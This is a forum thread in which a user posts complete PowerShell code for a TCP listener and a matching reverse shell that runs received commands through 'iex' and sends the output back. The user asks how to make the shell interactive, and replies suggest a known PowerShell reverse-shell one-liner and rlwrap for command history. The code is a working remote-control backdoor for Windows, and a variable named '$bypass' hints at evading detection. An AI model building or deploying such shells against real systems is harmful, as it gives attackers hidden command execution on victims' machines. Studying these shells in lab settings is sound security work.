Need some Help with a payload and reverse shell, how to make it interactive?

Off-topic
1

Host = Windows 10

Target = Windows 10

#Listener:
$socket = new-object System.Net.Sockets.TcpListener('127.0.0.1', 9001);

if($socket -eq $null){
	exit 1
}

$socket.start()
$client = $socket.AcceptTcpClient()
write-output "[*] Connection!"
$stream = $client.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 2048;
$encoding = new-object System.Text.AsciiEncoding;

do
{
    $cmd = read-host
    $writer.WriteLine($cmd)
    $writer.Flush();
    if($cmd -eq "exit"){
        break
    }
		$read = $null;
		while($stream.DataAvailable -or $read -eq $null) {
			$read = $stream.Read($buffer, 0, 2048)
            $out = $encoding.GetString($buffer, 0, $read)
            Write-Output $out
		}

} While ($client.Connected -eq $true)

$socket.Stop()
$client.close();
$stream.Dispose()

#Shell:

$sm=(New-Object Net.Sockets.TCPClient('127.0.0.1',9001)).GetStream();
#COMMENT
[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;
$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);
$bypass = "ASCII"
$st=([text.encoding]::$bypass).GetBytes((iex $d 2>&1));
$sm.Write($st,0,$st.Length)}

The shell is not interactive, it can do “whoami” and “dir” but when I try to use “cd” it gives the error on the target side and just uses the last command. this is run on powershell ise

any thoughts or help?

pic1
pic11288Ă—700 39.1 KB

2

It appears to be working. Errors are still thrown on the shell’s side but the directory change happens.

image
image921Ă—428 8.38 KB

3

Ok thank you, is there a way to make look more interactive, I know this on linux but not on Windows?

thanks again

4

Define, “look more interactive.” If you are talking about a prompt to show stuff like current working directory you can do that yep. It’s just a matter of your shell sending that information. You can see an example of that here. powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok · GitHub

If you are meaning more stuff like arrow keys, command history, etc. You can add that by using rlwrap on the server side.

1 Like
5

Thank you very much!

1 Like